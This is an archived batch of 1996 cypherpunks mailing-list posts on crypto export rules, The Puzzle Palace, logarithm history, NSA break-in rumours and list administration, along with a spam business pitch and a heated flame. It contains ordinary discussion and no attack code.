From: Brian Hale <bhale@ptw.com>
Date: Thu, 31 Oct 1996 00:04:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Why waste your money? Save big on long distance
Message-ID: <32785922.539B@ptw.com>
MIME-Version: 1.0
Content-Type: text/html

Title: A opportunity you can really be happy about! 





Hi ! Thank you for takeing a look at this post!
 Are you looking for a business that you can really be proud of ? Do you want to have a product that every
household can't do without  ? Would you like to save these households virtually half  of
what they are now spending, With a product thats meets or exceeds the product they are now useing ?
Would you do all of this if you can get started for free ? 
If this sounds like something you can represent ; you could get started now and be your own boss in  a 
year . This is a product  and business you can be proud of !
Please go to the first link and get signed up for free today.
Best of regards Brian Hale
PS If there is anything that I can do to help you get started please please
do not hesitate to ask. I love people and I love to help.
Click Me
Click Me 2
Email Me 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Thu, 31 Oct 1996 00:46:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: 2nd edition Puzzle Palace?
In-Reply-To: <v03007801ae9d518f7203@[207.167.93.63]>
Message-ID: <v03007801ae9e17af50c5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:10 AM +0000 10/31/96, Carol Harris wrote:
>However, there does appear to be a 1993 edition of the
>book.  Perhaps this is what Mr. Schneier was
>referencing?
>I happened to be at Borders bookstore in Austin
>this afternoon and checked.  They don't have it
>but will special order it.
>
>On Wed, 30 Oct 1996 10:42:39 -0800, Tim May wrote:
>
>>At 9:19 AM -0600 10/30/96, William I. MacGregor wrote:
>>>Applied Cryptography references a 2nd edition of The Puzzle Palace by
>>>Bamford and Madsen, 1995, but I can't seem to find it in any of the
>>>bookstores in Austin.  Has it been published?  Thanks,
>>>
>>
>>Read Ernest Hua's message from yesterday about this. He quoted an EE Times
>>article which said, in part:

No, I doubt this is what folks are referring to when they talk about the
forthcoming "Second Edition."

I bought the 1982 hardback of Bamford, in 1982 (even before I really knew
crypto issues were of such interest to me...quite possibly reading Bamford
helped prepare me). A paperback edition came out a year or two later, with
some added material. But it was--so far as I know--still the First Edition.

The long-awaited Second Edition will be a major rewrite, as noted in the
various comments over the past couple of years.

--Tim May

"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 31 Oct 1996 10:11:11 -0800 (PST)
To: stewarts@ix.netcom.com
Subject: Re: ITAR / S 1726 / Civil Disobedience
In-Reply-To: <1.5.4.32.19961030210453.003cfe40@popd.ix.netcom.com>
Message-ID: <199610310108.BAA00269@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewarts <stewarts@ix.netcom.com> writes:
> At 08:03 AM 10/30/96 EST, you wrote:
> >Would it be appropriate for other users to forward this 
> >message to the prez with their signatures?
> 
> The message was sent from "cypherpunks@toad.com" and signed
> "Cypherpunks", which was highly inappropriate.
> (Wasn't a bad message, but cypherpunks is a bunch of
> individuals, it's not an anonymous collective...)

The text of the message is from Vince Cate's arms-trafficker page.

	http://online.offshore.com.ai/arms-trafficker/

The page offers to send the message cc the president.  I presume
someone decided to forge a from line "cypherpunks@toad.com", and cc'd
to Herr Klinton.  (Unless the page would acheive this by entering this
as a from address of cypherpunks@toad.com in the box?)

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Thu, 31 Oct 1996 10:10:00 -0800 (PST)
To: minow@apple.com
Subject: Re: News: Sony/Philips has trouble exporting TV's
In-Reply-To: <v03007803ae9da57b4a8c@[17.202.40.158]>
Message-ID: <199610310121.BAA00273@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Martin Minow <minow@apple.com> writes:
> Ern Hua 
> >    [quoting a news story]
> 
> At the Bernstein case oral arguments last September, I distinctly
> remember the government lawyer stating that the United States does
> not restrict "financial cryptography." Perhaps he should have
> qualified his argument somewhat.
> 
> This statement bothered me, as I cannot understand how an encryption
> algorithm can "know" that it is encrypting a financial transaction,
> rather than some non-financial document that would be export-restricted.

It's highly bogus, I'm sure, but what they seem to be doing is
allowing strong encryption for very small messages.  (eg SET, and at
least one other example I'm aware of)  Of course users could
manufacture hundreds of bogus small messages to produce one large
message.  But then they could probably also find multiple examples of
low bandwidth subliminal channels in the protocl/algorithms, and if
they're willing to use their own software they could use PGP anyway.

If it's anything like ITAR it will be decied on a case-by-case basis,
and they'll only give you permission if you conform to undisclosed,
and continually changing NSA internal policies.  Or perhaps it's just
if on their whim, it'd be difficult to distinguish.

The actual agenda as always is to discourage use of strong crypto both
inside and outside the US.

Adam
--
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cypher@cyberstation.net
Date: Thu, 31 Oct 1996 00:18:19 -0800 (PST)
To: Victor Fiorillo <c62op27@ibx.com>
Subject: Re: "Montgolfiering" mindlessness
In-Reply-To: <9610301347.AA16765@ibx.com>
Message-ID: <Pine.BSI.3.95.961031014912.26657B-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain



Talk the talk |= Walk the walk`

If we could bottle up all the hot air espoused by fools like you, we
could solve the worldwide energy crisis. Obviously, you are not interested
in the facts. You engage in baneful contravallation of jabberwocky since
you, and the others so predisposed, are totally clueless with regard to
how to break the algorithm.0

Now let us hear your plaintive wail of the lame brain excuse about
not wanting to waste your time, always the indicant of intellectual pap
and intellectual cowardice/dishonesty by super mouthers like you. I may be
mindless, but obviously you and Mr. Franz are  brainless, or otherwise you
would try to prove something instead of beating off your brains and mouth
about it. As with Perry, and  others your information content is:

P log_base_infinity P 

Stop jerking everyone around. Fess up, you are either dumb or dumber, and
it is self evident that it is the latter. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: charris@eden.com (Carol Harris)
Date: Wed, 30 Oct 1996 19:05:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: 2nd edition Puzzle Palace?
In-Reply-To: <v03007801ae9d518f7203@[207.167.93.63]>
Message-ID: <327a17a9.9358725@mail.eden.com>
MIME-Version: 1.0
Content-Type: text/plain


However, there does appear to be a 1993 edition of the
book.  Perhaps this is what Mr. Schneier was 
referencing?
I happened to be at Borders bookstore in Austin
this afternoon and checked.  They don't have it
but will special order it.

On Wed, 30 Oct 1996 10:42:39 -0800, Tim May wrote:

>At 9:19 AM -0600 10/30/96, William I. MacGregor wrote:
>>Applied Cryptography references a 2nd edition of The Puzzle Palace by
>>Bamford and Madsen, 1995, but I can't seem to find it in any of the
>>bookstores in Austin.  Has it been published?  Thanks,
>>
>
>Read Ernest Hua's message from yesterday about this. He quoted an EE Times
>article which said, in part:
>
(snip of Mr. Hua's message)


Carol Harris <charris@eden.com>
Keyprint: BF E4 61 D5 43 35 EB 62 56 CA EB 17 B8 56 C3 A2




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: c62op27@ibx.com (Victor Fiorillo)
Date: Thu, 31 Oct 1996 03:12:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: Montgolfier was a JOKE
Message-ID: <9610311101.AA17485@ibx.com>
MIME-Version: 1.0
Content-Type: text/plain


>The Montgolfier post sent anonymously
>was a joke and I thought quite a good one.
>(It wasn't me and I don't know who it was.)

>It was poking fun at the QED pest at cyberstation
>who really was writing drivel.

>So far 2 people have missed the point and let 
>us know about it.



> -- Peter Allan    peter.allan@aeat.co.uk

Thanks for the enlightenment, Peter.  The problem is that it resembled the real "drivel" that passes through here far too often.  So, I did not bother to read the whole piece.

Kudos to the author for getting a biting satire by a person who writes them for a living.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: c62op27@ibx.com (Victor Fiorillo)
Date: Thu, 31 Oct 1996 03:14:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: silly putty
Message-ID: <9610311107.AA17516@ibx.com>
MIME-Version: 1.0
Content-Type: text/plain


Oh, and the laughs just keep on comin'...

----- Begin Included Message -----

>From cypherpunks-errors@toad.com Thu Oct 31 02:42:30 1996
X-Sender: gbroiles@mail.io.com
X-Mailer: Windows Eudora Pro Version 3.0b28 (32)
Date: Wed, 30 Oct 1996 20:38:22 -0800
To: sameer <sameer@c2.net>
From: Greg Broiles <gbroiles@netbox.com>
Subject: Re: silly putty
Cc: cypherpunks@toad.com
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-cypherpunks@toad.com
Precedence: bulk
Content-Length: 3755
X-Lines: 81
Status: RO


>	Would anyone be interested in 50 pounds of silly putty? A
>friend of mine would be grateful if I could help him get rid of 50
>pounds of silly putty. It would be $500.

Dear Mr. Parekh:

I represent the Comic Publishers Association, a trade group formed to
combat the illict theft of our members' intellectual property. Your message
has come to the attention of our "flexible media" section, which licenses
the duplication of our  members' creative efforts in flexible media, such
as Silly Putty (tm). Many people do not realize (or, more likely, merely
pretend not to realize) that the duplication, even in mirror image, of
portions of protected comic strips in  flexible media infringes upon our
members' exclusive rights as granted by the Copyright Acts of 1909 and
1976, 17 USC 101 et seq.

Further, the irresponsible distribution of this flexible media by
fly-by-night retailers and distributors compounds this problem. Many of the
wrongdoers who violate our members' rights do so as part of an informal
social framework, utilizing aliases like "Junior", or common first names
such as "Billy" or "Tommy". You can imagine our members' frustration when
we must enforce our rights against six and seven year old defendants known
merely as "Jimmy" or "that big kid from soccer practice".

The fact that flexible media can be used to make illicit copies of visual
art is well known; in fact, it is one of the selling points used when
flexible media is sold at the retail level. It is our position that
distributors and retailers selling flexible media do so knowing full well
that their juvenile purchasers intend to irresponsibly flout the Copyright
Act; and that such sales constitute contributory infringement. Sellers of
flexible media are the linchpins in the deadly chain of comic book
copyright infringement via "Silly Putty (tm)". 

We realize that some retailers do not wish to be complicit in this serious
injustice. Therefore, we have drafted the "flexible media code of conduct",
which we are asking sellers of flexible media to sign. We are asking you to
sign this code of conduct as a demonstration of your good will and
responsibility towards copyright owners worldwide. If you do not sign our
code of conduct we'll make some stuff up and then sue you and send out lots
of press releases. 

 ---

FLEXIBLE MEDIA SELLER'S CODE OF CONDUCT

As a seller of "Silly Putty (tm)" flexible media, I agree to:

1.	Maintain records of the first name, last name, parent(s)' names,
school's name, teacher's name, and grade level of every purchaser of
flexible media.

2.	Present an educational program which will sensitize my customers to the
grave responsibilities that the Copyright Act imposes upon each of us.

3.	Police my customers' use of flexible media, including but not limited to
in-store use of flexible media, simultaneous purchases of flexible media
and comic books such that illegitimate use can be inferred from the
circumstances, and the structuring of transactions to obscure what would
otherwise be simultaneous or contemporaneous purchases of flexible media
and comic books.

4.	Cooperate with the Comic Publishers Association by providing customer
lists and transaction detail logs so that suspicious purchase patterns at
multiple retail location may be tracked by the CPA.

5.	Agree to allow the CPA to audit my records and record keeping
procedures, at any time, without notice or right to refuse. 

 ---

Please print out a copy of our agreement, sign it, and mail it to me via
postal mail by the close of business tomorrow. Flexible media copies are
not acceptable. If you don't, we'll kick your ass. 

Have a nice day. 

/s/ L. Itta-Gator (#65535)
for DEWEY, CHEATHAM, & HOWE, P.C.
Counsel for Comic Publishers Association



----- End Included Message -----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Thu, 31 Oct 1996 07:24:40 -0800 (PST)
To: lurker@mail.tcbi.com
Subject: Re: Privacy Issues
Message-ID: <199610311525.HAA00906@crypt>
MIME-Version: 1.0
Content-Type: text/plain


I recommend the web/gopher site <URL: http://chaos.taylored.com:1000/ >
managed by Chael Hall and Karl Barrus.  It has a collection of articles
from the early days of the cypherpunks list when we initially explored
a lot of the ideas which are getting rehashed today.  In fact, I
would recommend this to all new readers of the list in order to
understand what has been discussed before and what some of our goals
have been.  Looking back, some of the essays seem a bit naive in our
hopes and expectations for what crypto would do; things have turned
out to be more corporate, more political, less grass-roots, than many
of us expected.  But the basic issues have remained much the same.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Thu, 31 Oct 1996 09:17:09 -0800 (PST)
To: cypherpunks@toad.com
Subject: Discrete logs 1
Message-ID: <199610311716.JAA00988@crypt>
MIME-Version: 1.0
Content-Type: text/plain


"Even adders can multiply using log tables..."

PGP is moving to discrete log based cryptography.  It will still
support RSA, but people will be encouraged to generate discrete log
keys.  It will use RSA to encrypt to people with RSA keys, and
discrete log crypto to encrypt to people with discrete log keys.

Many discrete log cryptosystems will be patent free after next year.
It may be that they will become more popular over the next few years
for that reason.  RSA has several more years before its patents
expire.

Most people are not as familiar with the math behind discrete logs as
they are with RSA.  The general idea of the difficulty of factoring is
pretty easy to understand.  It's much easier to multiply two large
primes together than to figure out what the primes were just by
looking at the result.  Discrete logs require a little more
explanation.

First I am going to write a little bit about the lore of logarithms.
I think today a lot of people don't know what they are.  When I was a
boy, in the 1960's, computers and even calculators were not widely
available.  Yet engineers in many fields needed to perform
calculations.  Reaction rates, material strengths, friction, current
flow, all such calculations require multiplication and division of
numbers with several significant digits.  The choices were basically
to multiply it out the long way, which was slow, error-prone, and
wasteful because it generates twice as many digits as you need; use a
slide rule, which usually only gets you two or three digits of
accuracy; or to use log tables, which could get you four or five, or
sometimes even more, accurate digits.

The logarithm of a number is the power that you have to raise some
specified base (usually 10 for these purposes) to in order to get that
number.  The logarithm of 100 base 10 is 2 because 10**2 = 100.  The
log of 1000 is 3.  For numbers not powers of 10, the logarithm has
fractional parts.  The logarithm of 20 is about 1.3, for example.  To
multiply two numbers, you find their logs and add them, and then turn
the result back into a number.  To divide, subtract the logs.  So most
of the work is just in looking up what the logs are using published
tables.

Actually we do use logs in a crude form in much of cryptography.  Any
time you say that the product of two 512 bit numbers is 1024 bits what
you mean is that the log base two of the smaller numbers is about 512,
and so the log base two of their product is 512+512 or 1024.

By the time I was in high school calculators were becoming fairly
widespread, but we still learned how to use log tables to do
multiplication and division.  Whole books were published containing
nothing but tables of the logarithms of numbers.  You can still find
these sometimes in used book stores.  There were lots of tricks to
using these tables which we had to learn.  Logarithms of numbers less
than 1 are negative, but the trick was to treat them as the sum of a
positive fractional part and a negative integer, so for example the
log of .2 was treated as +.3 - 1.  This made it easier to look up the
values.  And there were special sub-tables within the tables to help
with interpolating, looking up log values between the entries in the
table.  Using these you could get more accuracy in your answers.  All
this was part of the craft of working engineers and scientists of the
time.

It's hard for people today, raised on throwaway and even virtual
calculators, to understand the sense of power that came from using
logs for calculations.  Until we learned these advanced techniques the
only accurate alternatives were the terribly tedious hand methods.
Being able to get results by adding up a few numbers from a book was
an amazing improvement.

The discrete logs used in crypto have very different mathematical
properties than regular logarithms, but I thought this bit of history
would spark some memories in old-timers and give a new perspective for
younger people.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Genocide <gen2600@shelob.aracnet.com>
Date: Thu, 31 Oct 1996 10:26:02 -0800 (PST)
To: barrensj@gate.net
Subject: Re: Abducted by Aliens??
In-Reply-To: <N.102896.221957.52@stpfl1-52.gate.net>
Message-ID: <Pine.LNX.3.95.961031101853.5713B-100000@shelob.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain



	What in the hell is this email message??
Gen

On Tue, 29 Oct 1996 barrensj@gate.net wrote:

> You Little Cutie, You --
> 
> All right already!  What about choice Z?  I waited so long to respond to the 
> joke (which I went around telling everyone) I got embarrassed.  The longer I 
> waited, the more stuff happened so that I just couldn't catch up and tell all.  
> What about that one????
> 
> Actually nothing is happening (oh, except for St. Pete burning last Thursday 
> night) but we manage to stay frenetically busy. Teaching dance -- the kids -- 
> doing my mother/wife/housewife/daughter/friend/neighbor duties.
> 
> I'm very, very sorry to hear about your mother's illness.  My friend/neighbor 
> just told me she's been diagnosed with depression and is having a difficult 
> time overcoming the stigma.  There's a pile of ignorance out there.  I'm sure 
> you're aware that chronic illness and injury can take down whole families.  
> How's your dad holding up?  It sounds selfish, but I hope you're taking care of 
> yourself.  It's particularly difficult when you live so nearby except that when 
> something is wrong and you're not there it's somehow worse.
> 
> Also, too bad about your heavy work load. On the other hand, I'm glad you still 
> have your job.  I was also particularly happy to hear that The Equine is 
> feeling frisky again.
> 
> This business about JP is so weird.  I wish he were normal and you two could be 
> friends. But it just seems like. . . like . .. ?????  I mean, what would it 
> hurt 'im?  It's just BIZARRE!  And I absolutely think it's NOT you!  I mean, 
> aren't we all civilized adults here?
> 
> You'll be glad to know that we finally got Hannah a pet:  Mexican jumping 
> beans.  She's named them Rosie, Rosie and Rosie.  (You think we're REAL mean, 
> huh?)  Well, they ARE low maintenance!
> 
> I hope you got the cc: of the message I sent Kika over the weekend.  It had a 
> short update of sorts on our condition which is, "Can't complain."
> 
> So .. . . I DO still love you.  You are still a good friend for putting up with 
> me.
> 
> Love,
> 
> Ruth
> 

Genocide
Head of the Genocide2600 Group


============================================================================
		   **Coming soon! www.Genocide2600.com!!**
        ____________________
 *---===|                  |===---*
 *---===|     Genocide     |===---*   "You have heard of me,
 *---===|       2600       |===---*    You have known what I have done,
 *---===|__________________|===---*    But if you really SEE me,
                                       You'll know your time has come."
Email:
gen2600@aracnet.com
					   Available on the web:
Beeper: (503) 204-3606
					Http://www.aracnet.com/~gen2600


Something I've been known to babble in my sleep:

   It is by caffeine alone that I set my mind in motion.
   It is by the Mountain Dew that the thoughts acquire speed,
   the lips acquire stains, the stains become a warning.
   It is by caffeine alone that I set my mind in motion.

============================================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 31 Oct 1996 08:57:27 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: "Montgolfiering" mindlessness
In-Reply-To: <199610310426.UAA22752@netcom6.netcom.com>
Message-ID: <Pine.BSF.3.91.961031104516.20141A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 30 Oct 1996, Bill Frantz wrote:

> Gee, I put that post in the same place I carefully keep my back issues of
> the Cypherpunks Enquirer.
> 

Bill, you must be humor-impaired. That piece was a great send-up of 
Woods. I was laughing 'til tears spilled down an shorted out my keyboard. 
I dunno who posted that, but I'm in awe.

-r.w.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hallam-Baker <hallam@ai.mit.edu>
Date: Thu, 31 Oct 1996 08:27:53 -0800 (PST)
To: Derek Bell <cypherpunks@toad.com
Subject: Re: When did Mondex ever claim to be anonymous?
In-Reply-To: <558iqm$8m1@life.ai.mit.edu>
Message-ID: <3278D196.41C6@ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Derek Bell wrote:
> 
> In message <Pine.HPP.3.91.961029194511.27228A-100000@cor.sos.sll.se>, Asgaard w
> rites:
> >Disinformation is a time-honoured weapon in political struggle.
> >A rumour is called just that because it can't easily be checked
> >- somebody heard from somebody, who heard from somebody etc. The
> >spreader is hardly ever discredited since he does not guarantee
> >the validity of the information. 'It's just a rumour, but...'
> 
>         The problem I have is with the "hardly ever" part - there is always
> a chance of being caught out. 

Or of being ignored entirely. I quite often know something that I can't
point to proof of. I wouldn't try to use such evidence in an argument
as "proof". 

Acting on rumour is ultimately self defeating. The republicans have been
dirt digging on Whitewater for four years and have failed to unearth
anything. As a result they are finding it very difficult to get
anywhere with their latest allegations of campaign corruption which 
are probably true. Of course they might not be having any effect for
other reasons such as the fact that its Bob Dole's campaign 
vice-president thats in jail for corruption at the moment and not
Clinton's but the general principle holds, you don't shoot until
you know you can hit the target.


> >Those arguing in favour of Big Brother - 'the needs of law enforcement'
> >- frequently use (probably false) information that is hard to check, to
> >impress the public: about terrorists stopped by wiretapping,
> 
>         This is interesting, as the UK police don't claim they need such
> powers to deal with the IRA. Now they may already have large wiretapping
> powers under law, but I get the impression that most successful anti-IRA
> action is due either to infiltration or informers.

Actually the police are currently asking for permission to use wiretap
evidence in court. There is some opposition because there are those who 
want to keep the extent of the capability quiet. There is very good
evidence
for widespread use of wiretaps and SIGINT against the IRA.


>         IIRC, the bullshit claims are enough to annoy most netizens, though
> the politicians aren't aiming at us. Still - I think documented risks of,
> say, Mondex would hold more weight.

Since when was cash annonymous? In the UK each banknote has a serial
number 
which is recorded at the banks when it is passed arround. There is no
reason 
why the US federal reserve wouldn't have added it to its existing note
processing machinery since they must read the serial number during their 
checks for countrefeit notes.

If Mondex said their product was "like cash" that does not mean they
claimed 
it to be anonymous.

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Thu, 31 Oct 1996 04:34:05 -0800 (PST)
To: wb8foz@nrk.com
Subject: Re: Rumours of NSA breakin
In-Reply-To: <199610302006.PAA18786@wauug.erols.com>
Message-ID: <Pine.LNX.3.94.961031121436.453B-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 30 Oct 1996, David Lesher / hated by RBOC's in 5 states wrote:

> Alex Filacchione sez:
> > 
> > 
> > 	I've been hearing rumours of an alledged compromise
> > of the NSA Web server but no hard evidence. The claim made is
> > that several Mb of files were downloaded from the server and
> > posted to the "Internet". I can't see it in sci.crypt or
> > alt.conspiracy though.
> 
> I asked a Well-Placed friend. He assured me that if it has, it's
> news to the folks who own the machine ;-}
> 
> Not even Fort Fumble would put their www server within half a
> kilck of a classified machine.
> 

Not like it matters.  Have you ever looked at how many machines are on
nsa.gov?  Its not a really big number.  Actually, its 1.  The *only*
machine on nsa.gov is gary7.nsa.gov, aka www.nsa.gov, which is run by
bbnplanet.com anyway.  The rest of the NSA machines are on ncsc.mil (or
some other .mil)

 --Deviant
All extremists should be taken out and shot.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ISP-TV Main Contact <isptv@access.digex.net>
Date: Thu, 31 Oct 1996 09:32:41 -0800 (PST)
Subject: Internet Expert John Hardie on ISP-TV's "Real Time"
Message-ID: <199610311732.MAA20040@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


*** ISP-TV Program Announcement: Internet Expert John Hardie Interview ***

*** Monday, Nov. 4  ***
*** 9:00 PM ET      ***

Internetworking expert John Hardie will be the guest on ISP-TV's "Real
Time" interview series this week.  Hardie has helped magnage the MAE East,
one of the major Internet access points where Internet service providers
peer and exchange traffic.  He has also spent four years managing national
Internet sales for MFS Communications, and helped the company to become a
major pvider of Internet infrastructure.  Hardie is currently Director of
Sales for DIGEX's Private Networks Group. 

We will be asking Hardie questions about the history and growth of the
Internet, what the MAE's and other NAPs do to exchange Internet traffic,
and questions about the Internet business. 

This video interview can be viewed on the ISP-TV main CU-SeeMe reflector
at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at
http://www.digex.net/isptv/members.html

See URL http://www.digex.net/isptv for more information about the ISP-TV
Network

To obtain Enhanced CU-SeeMe software, go to:

	http://goliath.wpine.com/cudownload.htm







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ross Wright" <rwright@adnetsol.com>
Date: Thu, 31 Oct 1996 12:43:06 -0800 (PST)
To: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Subject: Computer Security Risk Assessment Software?
Message-ID: <199610312042.MAA12647@adnetsol.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


On or About 31 Oct 96 at 12:19, Dr.Dimitri Vulis KOTM wrote:

> which I assume is NOT what you have in mind :-) Do you mean
> something that'll take a survey of a company's computer security 

Boom.  Nail, head, one shot!!!!  What's on the market now in that 
area?

> and
> assess the risk (like Stan) or something more global? 

The issues are:

Information Risk Assessment and Management
and also Information Security Assessment.

> AFAIK, there's
> no tool on the market to help in all aspects of risk management even
> for a small outfit, because there are so many sources of risk. There
> are many good specialized packages.

"Ross Wright" <rwright@adnetsol.com> writes:
> I am about to do some marketing on a certain company's Risk
> Assessment Software.  At this time I can't say who that firm is, but
> I need information on what other firms are offering this type of
> software.  I figured someone on this list would know.


=-=-=-=-=-=-
Ross Wright
King Media: Bulk Sales of Software Media and Duplication Services
http://www.slip.net/~cdr/kingmedia
Voice: 415-206-9906




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Thu, 31 Oct 1996 04:05:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Cranky Listserver?
Message-ID: <199610311205.NAA21204@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Is anyone else having trouble getting their posts picked up on the list?
Messages I send to: cypherpunks@toad.com sometimes have to reposted as
many as three times before I see them in my incoming list traffic.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Thu, 31 Oct 1996 13:22:49 -0800 (PST)
To: "sameer@c2.net>
Subject: Re: silly putty
Message-ID: <19961031211946218.AAA96@io-online.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 30 Oct 1996 17:19:38 -0800 (PST), sameer wrote:

>	Would anyone be interested in 50 pounds of silly putty? A
>friend of mine would be grateful if I could help him get rid of 50
>pounds of silly putty. It would be $500.

You mean that silly putty sells for more than tri-tip?

#  Chris Adams <adamsc@io-online.com>   | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>		 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michael.tighe@Central.Sun.COM (Michael Tighe SUN IMP)
Date: Thu, 31 Oct 1996 12:10:19 -0800 (PST)
To: cypherpunks-errors@toad.com
Subject: Re: Rumours of NSA breakin
In-Reply-To: <9610291723.AA05462@etna.ai.mit.edu>
Message-ID: <199610312006.OAA09709@jeep.Central.Sun.COM>
MIME-Version: 1.0
Content-Type: text




>	I've been hearing rumours of an alledged compromise
>of the NSA Web server but no hard evidence. The claim made is
>that several Mb of files were downloaded from the server and
>posted to the "Internet". I can't see it in sci.crypt or 
>alt.conspiracy though.

While it is true the NSA has some machines directly connected to the
Internet (most are on private internal TCP/IP networks), and some even
contain classified information, their WWW server isn't one of them. So, it
is doubtful anything other than intended information was downloaded from
it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kimmo Suominen <kim@tac.nyc.ny.us>
Date: Thu, 31 Oct 1996 11:15:58 -0800 (PST)
To: cypherpunks@toad.com
Subject: Inappropriate postings
Message-ID: <199610311915.OAA00609@hrothgar.gw.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks,

I apologize for having gatewayed inappropriate messages to this
mailing list via my systems.  One of our new feeds for centralized
mailing list subscribal was leaking in messages from their USENET
feed.  I've asked them to fix this.

I have also taken steps to make sure no such misconfigured systems
can cause gatewaying through my system again.

Sincerely,

Kimmo Suominen
Trans-Atlantic Communications




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hard Media <zaid@hardnet.co.uk>
Date: Thu, 31 Oct 1996 06:06:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: tcmay in favour of redistribution of wealth?
Message-ID: <v01520d01ae9e641109f4@[158.152.61.59]>
MIME-Version: 1.0
Content-Type: text/plain



Date: Mon, 28 Oct 1996 10:15:35 -0800 tcmay wrote:
> While I won't get started again here, understand that my views are much
> more than just "justifiable apathy" about the people of the world.

Justifiable? I dunno bout that. (Sorry couldn't resist.)

>
> My point? I feel more strongly about the death of one of my pets than I do
> about hearing that some natural catastrophe in Bangla Desh has killed
> 100,000. And I think all honest persons will admit that this is a natural
> reaction. The "Hamming distance" matters, and people I have never met on
> the opposite side of the earth simply are _abstract numbers_ to me, as I am
> to them. Natural.

"Natural" is a dangerous word to use. I hadn't met any of the people
involved in
the Oklahoma bombing, nor had most of the world, yet there was worldwide
condemnation of the event. I hadn't met any of Hitler's concentration camp
victims but I'm still outraged at these events.

There are tangents and there are skew lines.

Oh yeah why people think I'm making an attack on Tim's character, his
looks, or whatever I don't understand, all I'm doing is criticising
something he wrote.

Where Walter Wriston/Third World debt is concerned the events are not
natural, we'r not talking about a flood, which is a "natural" event but the
actions of a man, or if you prefer an organisation. There is nothing "natural"
about these.

A country in debt to the IMF/World Bank or Citibank must accept
"Stabilisation Policies" :

"stabilisation policies are often viewed as measures designed primarily
to maintain poverty and dependency of Third World nations while
preserving the global market structure for the industrialised nations."

- "Economics for a Developing World", M P Todaro.

this is also known as "debt slavery". Not so good eh?

Zaid







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 31 Oct 1996 12:25:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: COR_set
Message-ID: <1.5.4.32.19961031202422.0069633c@pop.pipeline.com>
